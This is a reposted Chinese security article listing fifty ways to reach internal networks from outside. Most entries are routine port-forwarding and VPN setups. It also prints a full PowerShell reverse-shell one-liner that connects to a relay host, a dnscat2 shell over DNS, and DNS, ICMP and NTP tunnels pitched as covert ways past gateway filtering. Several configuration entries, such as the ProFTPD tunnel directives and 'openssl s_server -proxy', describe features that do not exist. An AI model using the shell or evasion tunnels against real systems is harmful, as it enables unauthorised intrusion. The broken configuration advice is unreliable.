2025-12-25 02:57:00 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 本文拆解了内网穿透的50种实战打法，涵盖端口映射、反向连接、隧道技术、P2P直连及设备自带功能五大方向。重点强调在授权优先与合规前提下，结合安全设备与审计机制规避风险。文章通过分析技术原理与适用场景，提供了安全建设与实战选型建议，旨在平衡运维便捷性与安全性，防止技术滥用。 综合评分： 92 文章分类： 内网渗透,红队,安全建设,安全运营,实战经验

cover_image

实战中内网穿透的 50 种打法！

GhostShell

HACK之道

2025年12月23日 08:01 重庆

内网穿透已从 “技术刚需” 演变为 “基础运维能力”。它本质是通过技术手段打破内网与公网的隔离边界，实现外部合法终端对内部资源的可控访问，但实战中需平衡 “便捷性” 与 “安全性”，避免沦为网络攻击的突破口。本文将从实战场景出发，拆解 50 种内网穿透打法，结合 20 + 网络安全设备的适配逻辑，提供可落地的技术方案与合规建议。

一、内网穿透的核心场景与安全前提

在展开具体打法前，需先明确内网穿透的适用边界 —— 它不是 “万能工具”，而是 “场景化解决方案”。所有实战操作均需建立在 “合法授权” 与 “合规评估” 基础上，未获得目标网络所有权人许可的穿透行为，均涉嫌违反《网络安全法》《数据安全法》，需坚决杜绝。

1. 核心实战场景

• 远程办公场景：员工居家或出差时，需访问企业内网的 OA 系统、文件服务器、ERP 数据库，需穿透企业防火墙与 NAT 设备的双重隔离。
• IoT 设备管理场景：工厂车间的 PLC 控制器、园区的智能监控摄像头、偏远地区的光伏逆变器，需通过穿透实现远程运维与数据采集。
• 测试调试场景：开发团队需将内网中的测试环境（如 APP 后端、小程序接口）暴露给外部测试人员或第三方合作方，验证功能兼容性。
• 多分支机构互联场景：连锁企业的门店、分公司需访问总部内网的核心资源（如财务系统、客户数据库），无需搭建专线即可实现低成本互联。

2. 安全前提三原则

1. 授权优先：穿透操作前必须签署《远程访问授权书》，明确访问范围（如仅允许访问某台服务器的 8080 端口）、访问时长（如临时 3 天）、操作责任人。
2. 最小权限：仅开放实现需求必需的端口与服务，例如远程办公只需开放 OA 系统的 443 端口，无需开放整个内网网段的所有端口。
3. 全程可追溯：所有穿透行为需接入日志审计系统，记录访问 IP、时间、操作内容，留存至少 6 个月，满足等保 2.0 的审计要求。

二、实战拆解：内网穿透的五大技术方向与 50 种打法

根据技术原理的不同，内网穿透可分为 “端口映射类”“反向连接类”“隧道技术类”“P2P 直连类”“设备自带功能类” 五大方向，每个方向对应不同的实战场景与设备适配要求。

（一）端口映射类：基于网关设备的 “正向穿透”（10 种）

核心逻辑：通过内网网关（如路由器、防火墙）的端口映射功能，将内网目标设备的 “内网 IP + 端口” 与网关的 “公网 IP + 端口” 绑定，外部终端访问网关公网端口时，流量自动转发至内网目标设备。

适用场景：网关拥有固定公网 IP，需访问内网单台或多台设备的特定服务（如 Web、远程桌面）。

1. 家用路由器端口映射

• 操作：登录路由器管理后台（如 TP-Link、华为路由的 192.168.1.1），进入 “端口转发” 模块，填写 “内网 IP（如 192.168.1.100）、内网端口（如 3389）、公网端口（如 8888）、协议（TCP）”，保存后生效。
• 适配设备：家用无线路由器（需支持端口转发功能），搭配内网 Windows 设备（开启远程桌面）。
• 注意：公网端口避免使用 80、443、3389 等默认端口，降低被扫描风险；需固定内网设备 IP（通过 DHCP 静态分配）。

2. 企业硬件防火墙端口映射

• 操作：登录防火墙管理界面（如华为 USG6000E、深信服 NGAF），进入 “策略 – 端口映射”，创建映射规则：“源区域（公网）、目的 IP（防火墙公网 IP）、目的端口（如 9000）、映射后 IP（内网服务器 10.0.0.5）、映射后端口（80）”，并放行对应流量策略。
• 适配设备：企业级硬件防火墙、内网 Web 服务器（如 Nginx、Apache）。
• 注意：需在防火墙同时配置 “端口映射规则” 与 “安全策略”（允许公网到内网的 TCP 9000 端口流量），二者缺一不可。

3. 软路由（OpenWRT）端口映射

• 操作：通过 LuCI 界面登录 OpenWRT，进入 “网络 – 防火墙 – 端口转发”，添加规则：“外部端口（如 2222）、内部端口（22）、内部 IP（内网 Linux 设备 192.168.2.20）、协议（TCP）”，保存并应用防火墙规则。
• 适配设备：软路由（如 x86 架构主机安装 OpenWRT）、内网 Linux 设备（开启 SSH 服务）。
• 优势：支持自定义脚本批量配置端口映射，适合多设备管理场景。

4. 交换机静态端口映射

• 操作：登录三层交换机（如华为 S5720、 Cisco Catalyst 9300），通过命令行配置：interface Vlanif10（进入外网 VLAN），nat server protocol tcp global current-interface 6000 inside ``192.168.10.30`` 21（将公网 6000 端口映射到内网 192.168.10.30 的 21 端口，用于 FTP 服务）。
• 适配设备：三层网管型交换机、内网 FTP 服务器。
• 场景：企业无独立防火墙，通过三层交换机实现路由与 NAT 功能时使用。

5. Windows Server RRAS 端口映射

• 操作：在 Windows Server（如 2019）中安装 “路由和远程访问服务（RRAS）”，进入 “NAT 和基本防火墙”，右键外网网卡选择 “属性 – 服务和端口”，勾选 “远程桌面” 并填写内网目标 IP，或自定义 “服务名称、公网端口、内网端口、IP”。
• 适配设备：Windows Server 服务器（作为网关）、内网 Windows 终端。
• 注意：需关闭服务器自带防火墙的冲突规则，确保映射端口可通。

6. Linux iptables 端口映射

• 操作：在 Linux 网关（如 CentOS 7）中执行命令：iptables -t nat -A PREROUTING -p tcp --dport 8080 -j DNAT --to-destination ``10.0.1.15:80（将公网 8080 端口映射到内网 10.0.1.15 的 80 端口），iptables -t nat -A POSTROUTING -d ``10.0.1.15`` -p tcp --dport 80 -j SNAT --to-source 网关公网IP（配置源地址转换），并保存规则：service iptables save。
• 适配设备：Linux 网关服务器、内网 Web 服务器。
• 优势：轻量灵活，无需额外硬件，适合小型企业或测试环境。

7. VMware 虚拟交换机端口映射

• 操作：在 VMware ESXi 中，进入 “网络 – 虚拟交换机”，选择连接外网的虚拟交换机，添加 “端口组” 并配置 “端口转发”：“外部端口（5901）、内部端口（5900）、内部 IP（虚拟机 192.168.3.5）”，实现外部通过 VNC 访问内网虚拟机。
• 适配设备：VMware ESXi 服务器、内网虚拟机（如 Ubuntu、Windows 10）。
• 场景：虚拟化环境中，无需通过物理网关即可穿透虚拟机。

8. Docker 容器端口映射

• 操作：启动容器时通过-p参数配置：docker run -d -p 8088:80 nginx（将宿主机的 8088 端口映射到容器的 80 端口），若宿主机为内网设备且已通过网关穿透，则外部可通过 “网关公网 IP:8088” 访问容器内的 Nginx 服务。
• 适配设备：Docker 宿主机（内网）、Nginx 容器、网关设备（如路由器）。
• 注意：宿主机需关闭防火墙对 8088 端口的限制，或添加放行规则。

9. NAS 设备端口映射

• 操作：登录群晖、威联通 NAS 管理界面，进入 “网络 – 端口转发”，添加规则：“应用（如 Synology Drive）、公网端口（6690）、内网端口（6690）、协议（TCP）”，并在网关设备（如路由器）中同步配置相同的端口映射，实现外部访问 NAS 的文件服务。
• 适配设备：NAS 存储设备（群晖 DS920+、威联通 TS-464C）、家用路由器。
• 优势：NAS 自带穿透工具（如群晖 QuickConnect），可替代手动端口映射，但公网访问优先选择手动映射（速度更快）。

10. IoT 网关端口映射

• 操作：登录工业 IoT 网关（如华为 IoT Gateway EG20），进入 “设备管理 – 端口映射”，配置 “外部端口（1883）、内部端口（1883）、内部 IP（内网 MQTT 服务器 192.168.100.20）、协议（TCP）”，实现远程 MQTT 客户端访问内网 IoT 设备。
• 适配设备：工业 IoT 网关、内网 MQTT 服务器、PLC 控制器。
• 场景：工业场景中，远程监控与控制内网 IoT 设备。

（二）反向连接类：基于客户端的 “主动穿透”（12 种）

核心逻辑：内网设备主动与公网中的 “中转服务器” 建立连接，外部终端通过访问中转服务器，间接与内网设备通信（无需内网网关有固定公网 IP）。

适用场景：内网网关为动态公网 IP 或对称 NAT（无法通过端口映射穿透），需访问内网设备的服务。

1. FRP 反向代理（TCP 协议）

• 操作：① 公网中转服务器部署 FRP 服务端（frps），配置frps.ini：[common] bind_port = 7000（服务端端口）；② 内网设备部署 FRP 客户端（frpc），配置frpc.ini：[rdp] type = tcp local_ip = ``127.0.0.1`` local_port = 3389 remote_port = 6000（将内网 3389 端口映射到中转服务器 6000 端口）；③ 外部通过 “中转服务器 IP:6000” 访问内网远程桌面。
• 适配设备：公网云服务器（如阿里云 ECS）、内网 Windows 设备、FRP 工具。
• 注意：中转服务器需放行 7000（服务端）与 6000（映射）端口，客户端需保持联网。

2. FRP 反向代理（UDP 协议）

• 操作：在 FRP 客户端配置中添加 UDP 规则：[udp-test] type = udp local_ip = ``192.168.1.5`` local_port = 53 remote_port = 5353，实现外部通过中转服务器 5353 端口访问内网 DNS 服务（UDP 协议）。
• 适配设备：公网中转服务器、内网 DNS 服务器、FRP 工具。
• 场景：需穿透 UDP 服务（如 DNS、VPN 的 L2TP 协议）时使用。

3. NPS 反向代理（多设备管理）

• 操作：① 公网服务器部署 NPS 服务端，创建 “客户端” 并获取 “客户端密钥”；② 内网多台设备部署 NPS 客户端，输入密钥连接服务端；③ 在 NPS 管理界面为每台客户端配置 “端口映射”（如客户端 A 映射 3389 到中转 8001，客户端 B 映射 22 到中转 8002）。
• 适配设备：公网云服务器、内网 Windows/Linux 设备、NPS 工具。
• 优势：支持 Web 管理界面，可批量管理多台内网设备的穿透规则，比 FRP 更适合企业场景。

4. ZeroTier 反向访问（虚拟局域网）

• 操作：① 在 ZeroTier 官网创建 “虚拟网络”，获取 “网络 ID”；② 内网设备与外部终端均安装 ZeroTier 客户端，加入同一虚拟网络（输入网络 ID）；③ 内网设备在 ZeroTier 中获取 “虚拟 IP”（如 10.147.17.20），外部终端通过该虚拟 IP 直接访问内网设备（无需端口映射）。
• 适配设备：内网 Windows/Linux 设备、外部终端（手机 / 电脑）、ZeroTier 客户端。
• 场景：需穿透多台设备且实现 “点对点访问”，无需依赖公网中转服务器（流量直连）。

5. Tailscale 反向访问（基于 WireGuard）

• 操作：① 内网设备与外部终端均注册 Tailscale 账号并登录客户端；② 客户端自动创建虚拟网络，内网设备获取 “Tailscale IP”（如 100.64.0.5）；③ 外部终端通过该 IP 访问内网设备的服务（如 SSH、RDP），支持通过 “子网路由” 访问内网整个网段（需在 Tailscale 中开启）。
• 适配设备：内网服务器、外部终端、Tailscale 客户端。
• 优势：基于 WireGuard 协议，速度快、延迟低，支持自动端口转发（NAT traversal），无需手动配置。

6. 花生壳反向代理（动态 DNS + 穿透）

• 操作：① 内网设备安装花生壳客户端，登录账号并获取 “SN 码”；② 在花生壳官网添加 “映射”：“应用类型（如远程桌面）、内网 IP（192.168.1.100）、内网端口（3389）、外网端口（自动分配或自定义）”；③ 外部通过 “花生壳域名：外网端口” 访问内网设备。
• 适配设备：内网 Windows/Linux 设备、花生壳客户端、家用路由器（动态公网 IP）。
• 场景：内网网关为动态 IP，无需手动更新 DNS 解析，花生壳自动同步 IP 与域名绑定。

7. 向日葵远程控制（带穿透功能）

• 操作：① 内网设备安装向日葵客户端，登录并获取 “设备识别码”；② 外部终端安装向日葵控制端，输入 “设备识别码 + 验证码” 连接内网设备，支持远程桌面、文件传输、命令行操作（穿透功能由向日葵服务器中转实现）。
• 适配设备：内网 Windows/macOS 设备、外部终端（电脑 / 手机）、向日葵客户端。
• 优势：无需配置端口或公网 IP，纯图形化操作，适合非技术人员使用。

8. TeamViewer 反向访问（跨平台穿透）

• 操作：① 内网设备与外部终端均安装 TeamViewer，内网设备获取 “ID” 与 “密码”；② 外部终端输入内网设备的 “ID” 与 “密码”，直接建立连接，支持远程桌面、VPN（TeamViewer VPN）功能，可访问内网其他设备。
• 适配设备：内网 Windows/macOS/Linux 设备、外部终端、TeamViewer 客户端。
• 注意：商用场景需购买授权，免费版仅支持个人非盈利使用。

9. AnyDesk 反向访问（低延迟）

• 操作：① 内网设备安装 AnyDesk，获取 “设备地址”（如 xyz123abc）；② 外部终端输入该地址，请求连接，内网设备确认后建立远程桌面连接，支持 “无人值守访问”（需设置密码）。
• 适配设备：内网 Windows/macOS 设备、外部终端、AnyDesk 客户端。
• 优势：延迟低（比 TeamViewer 快），适合远程操作对实时性要求高的场景（如工业设备控制）。

10. SSH 反向隧道（Linux 设备）

• 操作：内网 Linux 设备执行命令：ssh -fN -R 中转服务器端口:内网目标IP:内网端口中转服务器用户@中转服务器IP，例如ssh -fN -R 2222:``192.168.1.5:22`` ``[email protected]（将内网 192.168.1.5 的 22 端口映射到中转服务器 2222 端口）；外部终端通过ssh 中转服务器用户@中转服务器IP -p 2222，即可间接登录内网设备。
• 适配设备：内网 Linux 设备、公网中转服务器（需开启 SSH 服务）。
• 优势：无需安装额外工具，依赖系统自带 SSH 服务，适合 Linux 运维场景。

11. PowerShell 反向隧道（Windows 设备）

• 操作：内网 Windows 设备通过 PowerShell 执行命令：$client = New-Object ``System.Net``.Sockets.TCPClient("中转服务器IP", 7000); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + "PS " + (pwd).Path + "> "; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()，中转服务器通过nc -lvp 7000监听端口，建立反向 Shell，实现外部控制内网 Windows 设备。
• 适配设备：内网 Windows 设备（支持 PowerShell 5.1+）、公网中转服务器（需安装 nc 工具）。
• 注意：仅用于合法授权的运维操作，反向 Shell 是黑客常用攻击手段，需严格控制权限。

12. Termux 反向隧道（移动端内网设备）

• 操作：在安卓设备的 Termux 中执行命令：ssh -fN -R 8080:``192.168.1.10:80`` root@公网服务器IP（将内网 192.168.1.10 的 80 端口映射到公网服务器 8080 端口），外部通过访问公网服务器 8080 端口，间接访问内网 Web 服务。
• 适配设备：安卓设备（安装 Termux）、公网服务器、内网 Web 服务器。
• 场景：移动端作为内网网关，临时穿透内网服务。

（三）隧道技术类：基于协议封装的 “隐蔽穿透”（15 种）

核心逻辑：将内网服务的流量封装到公网允许通过的协议（如 HTTP、DNS、HTTPS）中，绕过网关设备的端口限制与流量过滤，实现 “隐蔽式” 穿透。

适用场景：内网网关限制严格（仅允许 HTTP/HTTPS/DNS 等常用协议通过），常规端口映射或反向连接被阻断。

1. HTTP 隧道（基于 Proxifier+CCProxy）

• 操作：① 内网部署 CCProxy，开启 “HTTP 代理” 功能（端口 808）；② 公网中转服务器部署 HTTP 隧道工具（如 reGeorg），上传tunnel.jsp到公网 Web 服务器（需支持 JSP）；③ 内网设备通过 Proxifier 配置 “HTTP 代理”，指向公网隧道地址（如 http:// 公网 IP/tunnel.jsp），外部终端通过访问公网隧道，间接访问内网 CCProxy 代理的服务。
• 适配设备：内网 CCProxy 服务器、公网 Web 服务器（支持 JSP/PHP）、Proxifier 客户端。
• 场景：网关仅允许 HTTP 流量通过，需穿透内网多类型服务（如 SSH、RDP）。

2. HTTPS 隧道（基于 Stunnel）

• 操作：① 公网服务器部署 Stunnel，配置stunnel.conf：[rdp] accept = 443 connect = 内网设备IP:3389 cert = /etc/stunnel/cert.pem（将 443 端口的 HTTPS 流量转发到内网 3389 端口）；② 内网设备开启远程桌面，外部终端通过 “公网 IP:443” 访问，Stunnel 自动解密 HTTPS 流量并转发到内网。
• 适配设备：公网服务器（安装 Stunnel）、内网 Windows 设备、SSL 证书（如 Let’s Encrypt）。
• 优势：HTTPS 协议不易被网关阻断（常用于网页访问），且流量加密，安全性高。

3. DNS 隧道（基于 iodine）

• 操作：① 公网服务器搭建 DNS 服务器（如 Bind），并配置域名（如test.com）的 NS 记录指向该服务器；② 公网服务器启动 iodine 服务端：iodined -f -c -P 密码 ``10.0.0.1`` ``test.com（分配虚拟网段 10.0.0.0/24）；③ 内网设备启动 iodine 客户端：iodine -f -c -P 密码 ``test.com，建立 DNS 隧道，外部终端通过虚拟 IP（10.0.0.2）访问内网设备。
• 适配设备：公网 DNS 服务器、内网 Linux/Windows 设备（安装 iodine）、域名（需备案）。
• 场景：网关仅允许 DNS 流量（UDP 53 端口）通过，其他协议被阻断（如酒店、校园网）。

4. DNS 隧道（基于 dnscat2）

• 操作：① 公网服务器启动 dnscat2 服务端：dnscat2 server -u --domain ``test.com`` --secret 密码；② 内网设备启动 dnscat2 客户端：dnscat2 client ``test.com`` --secret 密码，建立隧道后，服务端通过session -i 1进入交互模式，执行命令（如shell获取内网设备的 Shell）。
• 适配设备：公网服务器（安装 dnscat2）、内网 Linux/Windows 设备、域名。
• 注意：DNS 隧道速度较慢（受 DNS 查询频率限制），适合传输小流量数据（如命令、日志）。

5. SSH 动态端口转发（SOCKS 代理隧道）

• 操作：内网设备执行命令：ssh -D 1080 公网服务器用户@公网服务器IP，建立 SOCKS5 代理隧道；外部终端（如浏览器）配置 SOCKS5 代理（IP：内网设备 IP，端口：1080），即可通过隧道访问公网资源，或反向通过公网服务器访问内网资源。
• 适配设备：内网 Linux/Windows 设备（支持 SSH）、公网服务器、浏览器（如 Chrome）。
• 场景：需穿透内网访问公网（如规避地域限制），或外部通过公网服务器访问内网。

6. SSH 本地端口转发（正向隧道）

• 操作：外部终端执行命令：ssh -L 本地端口:内网目标IP:内网端口公网跳板机用户@公网跳板机IP，例如ssh -L 8080:``10.0.0.5:80`` ``[email protected]（将本地 8080 端口映射到内网 10.0.0.5 的 80 端口），外部通过访问 “localhost:8080”，间接访问内网 Web 服务。
• 适配设备：外部终端（Linux/macOS）、公网跳板机、内网 Web 服务器。
• 优势：仅外部终端需执行命令，内网设备无需配置，适合临时访问场景。

7. SSL 隧道（基于 OpenSSL）

• 操作：① 公网服务器生成 SSL 证书：openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes；② 公网服务器启动 SSL 隧道：openssl s_server -accept 443 -cert cert.pem -key key.pem -proxy 内网IP:3389；③ 外部终端连接隧道：openssl s_client -connect 公网IP:443，连接成功后输入 RDP 协议数据，访问内网远程桌面。
• 适配设备：公网服务器（安装 OpenSSL）、内网 Windows 设备、外部终端（支持 OpenSSL）。
• 场景：无 Stunnel 时，通过系统自带 OpenSSL 工具搭建 SSL 隧道。

8. WebSocket 隧道（基于 wstunnel）

• 操作：① 公网服务器启动 wstunnel 服务端：wstunnel -s :8080 tcp://内网IP:22（将 8080 端口的 WebSocket 流量转发到内网 22 端口）；② 外部终端启动 wstunnel 客户端：wstunnel -c ws://公网IP:8080 tcp://``localhost:2222，通过ssh ``localhost`` -p 2222访问内网设备。
• 适配设备：公网服务器（安装 wstunnel）、内网 Linux 设备、外部终端。
• 优势：WebSocket 协议常用于网页实时通信，网关一般不会阻断，适合穿透 SSH 服务。

9. MQTT 隧道（基于 EMQX）

• 操作：① 公网部署 EMQX MQTT 服务器，创建 “主题”（如device/123/control）；② 内网设备订阅该主题，外部终端发布 “控制指令” 到主题，EMQX 转发指令到内网设备；同时内网设备发布 “状态数据” 到另一主题（如device/123/status），外部终端订阅该主题获取数据，实现双向穿透。
• 适配设备：公网 EMQX 服务器、内网 IoT 设备（支持 MQTT）、外部 MQTT 客户端（如 MQTT X）。
• 场景：IoT 设备需远程控制与数据采集，MQTT 协议轻量，适合低带宽场景。

10. FTP 隧道（基于 ProFTPD）

• 操作：① 公网服务器安装 ProFTPD，配置proftpd.conf：TunnelPort 2121（隧道端口），TunnelTarget 内网IP 21（内网 FTP 端口）；② 外部终端通过 FTP 客户端（如 FileZilla）连接 “公网 IP:2121”，ProFTPD 将流量转发到内网 FTP 服务器，实现文件传输。
• 适配设备：公网 ProFTPD 服务器、内网 FTP 服务器、FTP 客户端。
• 注意：FTP 协议分主动模式与被动模式，需在隧道配置中指定模式，避免连接失败。

11. SMTP 隧道（基于 Postfix）

• 操作：① 公网服务器安装 Postfix，配置 “邮件转发” 规则：将发送到[email protected]`的邮件，转发到内网 SMTP 服务器（10.0.0.6:25）；② 外部终端发送邮件到[email protected]`，邮件内容携带 “控制指令”，内网服务器接收邮件并解析指令，执行后通过邮件回复结果，实现穿透通信。
• 适配设备：公网 Postfix 服务器、内网邮件服务器、外部邮件客户端（如 Outlook）。
• 场景：仅允许 SMTP（邮件发送）流量通过的网关，适合传输小流量指令。

12. ICMP 隧道（基于 ptunnel）

• 操作：① 公网服务器启动 ptunnel 服务端：ptunnel -p ``0.0.0.0`` -l 2222 -r 内网IP -R 22（将 2222 端口的 ICMP 流量转发到内网 22 端口）；② 内网设备启动 ptunnel 客户端：ptunnel -c 公网IP -l 22 -r ``127.0.0.1`` -R 22；③ 外部终端通过ssh 公网IP -p 2222访问内网设备。
• 适配设备：公网服务器（安装 ptunnel）、内网 Linux 设备、外部终端。
• 场景：网关阻断 TCP/UDP 流量，但允许 ICMP（ping）流量，适合应急穿透（速度慢）。

13. NTP 隧道（基于 ntpdate）

• 操作：① 公网服务器搭建 NTP 服务器，修改 NTP 协议数据包，在 “时间戳” 字段中嵌入 “数据 payload”；② 内网设备通过ntpdate -q 公网IP获取 NTP 数据包，解析 payload 中的指令；内网设备通过发送 NTP 请求，将结果嵌入 payload，回传给公网服务器，外部终端从公网服务器获取结果。
• 适配设备：公网 NTP 服务器、内网 Linux 设备（支持 ntpdate）、外部终端。
• 注意：NTP 隧道隐蔽性高，但数据传输量小，仅适合传输短指令（如状态查询）。

14. RDP 隧道（基于 mRemoteNG）

• 操作：① 公网跳板机开启远程桌面，外部终端通过 mRemoteNG 连接跳板机；② 在 mRemoteNG 中配置 “隧道”：“本地端口（33890）、目标 IP（内网 Windows 设备 IP）、目标端口（3389）”；③ 外部终端通过 “localhost:33890” 访问内网远程桌面，流量通过跳板机转发。
• 适配设备：公网跳板机（Windows Server）、内网 Windows 设备、mRemoteNG 客户端。
• 场景：需通过跳板机访问多台内网 Windows 设备，mRemoteNG 支持批量管理隧道。

15. VNC 隧道（基于 TightVNC）

• 操作：① 内网 Linux 设备安装 TightVNC Server，启动服务（端口 5900）；② 公网服务器安装 TightVNC Viewer，配置 “端口转发”：将公网 5901 端口转发到内网 5900 端口；③ 外部终端通过 TightVNC Viewer 连接 “公网 IP:5901”，访问内网设备的 VNC 桌面。
• 适配设备：公网服务器（安装 TightVNC Viewer）、内网 Linux 设备（TightVNC Server）、外部终端。
• 优势：VNC 支持跨平台，适合访问 Linux 设备的图形化桌面。

（四）P2P 直连类：基于 NAT 穿透的 “无中转穿透”（8 种）

核心逻辑：通过 NAT 穿透技术（如 UPnP、STUN、TURN），让内网设备与外部终端直接建立连接，无需公网中转服务器，减少延迟与带宽消耗。

适用场景：内网设备与外部终端均处于 NAT 网络（如家庭宽带、4G/5G 网络），需低延迟访问（如远程游戏、视频监控）。

1. UPnP 自动端口映射（家用场景）

• 操作：① 登录家用路由器（如小米路由、华硕路由），开启 “UPnP” 功能；② 内网设备（如监控摄像头、游戏主机）开启 UPnP 客户端，自动向路由器发送端口映射请求（如将摄像头的 554 端口映射到公网随机端口）；③ 外部终端通过路由器的公网 IP 与映射端口，直接访问内网设备。
• 适配设备：支持 UPnP 的家用路由器、内网监控摄像头（如海康威视）、游戏主机（如 PS5）。
• 注意：UPnP 存在安全风险（设备可能被恶意利用映射端口），建议仅在信任设备上开启。

2. STUN+TURN 穿透（WebRTC 场景）

• 操作：① 部署 STUN 服务器（如 coturn），用于获取内网设备与外部终端的 NAT 类型（如锥形 NAT、对称 NAT）；② 若双方为锥形 NAT，通过 STUN 获取公网 IP 与端口后，直接建立 P2P 连接；③ 若一方为对称 NAT，通过 TURN 服务器中转流量（ fallback ）；④ 基于 WebRTC 开发客户端（如浏览器页面），实现内网摄像头的实时视频流传输（外部通过浏览器直接观看）。
• 适配设备：STUN/TURN 服务器（如 coturn）、内网 WebRTC 设备（如带摄像头的 Linux 开发板）、外部浏览器（如 Chrome）。
• 场景：实时视频传输（如远程监控、视频会议），WebRTC 原生支持 STUN/TURN，开发成本低。

3. P2P 远程桌面（基于 ToDesk）

• 操作：① 内网设备与外部终端均安装 ToDesk，登录同一账号；② 内网设备开启 “P2P 直连” 功能，ToDesk 通过 STUN 获取双方公网信息，自动建立直连；③ 外部终端选择内网设备，发起远程桌面连接，流量不经过 ToDesk 服务器（延迟低）。
• 适配设备：内网 Windows/macOS 设备、外部终端、ToDesk 客户端。
• 优势：无需手动配置，自动适配 NAT 类型，适合个人远程办公。

4. P2P 文件传输（基于飞秋）

• 操作：① 内网设备与外部终端均安装飞秋，配置 “P2P 传输” 模式；② 外部终端通过飞秋搜索内网设备（需知道内网设备的飞秋 ID），发起文件传输请求；③ 飞秋通过 UPnP 或 STUN 穿透 NAT，建立直连，实现高速文件传输（速度取决于双方带宽）。
• 适配设备：内网 Windows 设备、外部 Windows 终端、飞秋客户端。
• 场景：需传输大文件（如 GB 级），P2P 直连比中转服务器速度更快。

5. P2P IoT 控制（基于涂鸦智能）

• 操作：① 内网 IoT 设备（如智能灯泡、插座）接入涂鸦智能平台，外部终端安装涂鸦 APP；② 首次连接时，APP 通过涂鸦服务器获取设备的 NAT 信息，建立 P2P 直连；③ 后续控制（如开关灯、调节亮度）均通过 P2P 通道，无需服务器中转，响应速度快。
• 适配设备：涂鸦智能 IoT 设备、外部手机（安装涂鸦 APP）、涂鸦云平台（仅首次建联用）。
• 优势：专为 IoT 设备优化，低功耗、低延迟，适合智能家居场景。

6. P2P 游戏联机（基于 Hamachi）

• 操作：① 内网游戏主机（如 PC、Xbox）与外部终端均安装 Hamachi，创建 “虚拟网络” 并邀请对方加入；② Hamachi 通过 STUN 穿透 NAT，为双方分配虚拟 IP（如 25.0.0.2、25.0.0.3）；③ 双方通过虚拟 IP 进行游戏联机（如《我的世界》《CS:GO》），流量直连。
• 适配设备：内网游戏主机、外部终端、Hamachi 客户端。
• 场景：游戏无官方联机服务器，需通过 P2P 实现私人联机。

7. P2P 视频监控（基于海康萤石）

• 操作：① 内网海康摄像头添加到萤石云平台，外部手机安装萤石云 APP；② APP 首次登录时，通过萤石云获取摄像头的公网访问信息，自动尝试 P2P 直连；③ 直连成功后，手机观看摄像头实时画面，流量不经过萤石云（节省带宽），延迟低于 1 秒。
• 适配设备：海康萤石摄像头、外部手机（萤石云 APP）、萤石云平台（首次建联）。
• 注意：若摄像头与手机处于不同运营商网络（如电信、联通），可能无法直连，需 fallback 到服务器中转。

8. P2P VPN（基于 WireGuard）

• 操作：① 内网设备与外部终端均安装 WireGuard，创建 “配置文件”：包含双方的公钥、虚拟 IP、端点（公网 IP: 端口）；② 双方导入配置文件，启动 WireGuard 服务，通过 STUN 获取对方公网端点后，建立 P2P VPN 隧道；③ 外部终端通过虚拟 IP 访问内网设备的服务（如 SSH、RDP）。
• 适配设备：内网 Linux/Windows 设备、外部终端、WireGuard 客户端。
• 优势：WireGuard 协议轻量、速度快，P2P 模式下无需 VPN 服务器，适合小型团队互联。

（五）设备自带功能类：基于硬件 / 系统的 “原生穿透”（5 种）

核心逻辑：利用网络设备或操作系统自带的穿透功能，无需安装额外工具，实现 “零部署” 穿透，降低运维成本。

适用场景：企业使用品牌硬件设备（如华为、深信服），或需简化运维的场景。

1. 华为防火墙 SSL VPN 穿透

• 操作：① 登录华为 USG6000E 防火墙，进入 “VPN-SSL VPN”，创建 “SSL VPN 网关”（绑定公网接口），配置 “地址池”（如 172.16.0.0/24）；② 创建 “资源授权”：允许访问内网 10.0.0.0/8 网段；③ 外部终端安装华为 SSL VPN 客户端（如 eSight），输入防火墙公网 IP、账号密码，连接后获取虚拟 IP，直接访问内网资源。
• 适配设备：华为 USG6000E 防火墙、外部终端（安装 eSight）、内网服务器。
• 优势：企业级设备，支持多用户并发，自带身份认证（如 USB Key、短信验证），安全性高。

2. 深信服 NGAF IPsec VPN 穿透

• 操作：① 总部深信服 NGAF 防火墙配置 “IPsec VPN 网关”：设置 “预共享密钥”“总部内网网段（192.168.0.0/24）”；② 分支机构防火墙（同型号）配置 “IPsec VPN 客户端”：输入总部网关公网 IP、预共享密钥、分支机构网段（192.168.1.0/24）；③ 双方建立 IPsec 隧道，分支机构可访问总部内网资源，反之亦然。
• 适配设备：深信服 NGAF 防火墙（总部 + 分支机构）、内网服务器。
• 场景：企业多分支机构互联，IPsec 协议标准，支持硬件加速，性能强。

3. Windows Server VPN（L2TP/IPsec）

• 操作：① 在 Windows Server 中安装 “远程访问” 角色，选择 “VPN” 服务，配置 “L2TP/IPsec” 协议，设置 “预共享密钥”“VPN 地址池（10.1.0.0/24）”；② 外部 Windows 终端通过 “设置 – 网络和互联网 – VPN”，添加 VPN 连接（输入服务器公网 IP、账号密码），连接后获取虚拟 IP，访问内网资源。
• 适配设备：Windows Server（2016/2019）、外部 Windows 终端、路由器（需开放 UDP 500、4500 端口）。
• 优势：无需额外硬件，依赖系统自带服务，适合小型企业远程办公。

4. macOS 自带 VPN（IKEv2）

• 操作：① 公网 VPN 服务器（如 pfSense）配置 IKEv2 协议，导入 SSL 证书；② 外部 macOS 终端通过 “系统设置 – 网络 – VPN”，添加 “IKEv2” 类型的 VPN 连接（输入服务器地址、远程 ID、证书），连接后通过虚拟 IP 访问内网设备。
• 适配设备：公网 IKEv2 VPN 服务器、外部 macOS 终端、内网设备。
• 优势：macOS 原生支持 IKEv2，无需安装客户端，连接稳定。

5. Linux OpenVPN 服务

• 操作：① 在 Linux 服务器（如 Ubuntu Server）中安装 OpenVPN，生成 “服务端配置文件”“客户端证书”；② 服务端启动 OpenVPN：openvpn --config server.conf；③ 外部 Linux 终端导入客户端证书，启动 OpenVPN：openvpn --config client.ovpn，连接后获取虚拟 IP，访问内网资源。
• 适配设备：Linux OpenVPN 服务器、外部 Linux 终端、内网设备。
• 优势：OpenVPN 支持多种加密算法（如 AES-256），跨平台（Windows/macOS/Linux），适合技术团队使用。

三、关键支撑：20 + 网络安全设备在穿透中的作用

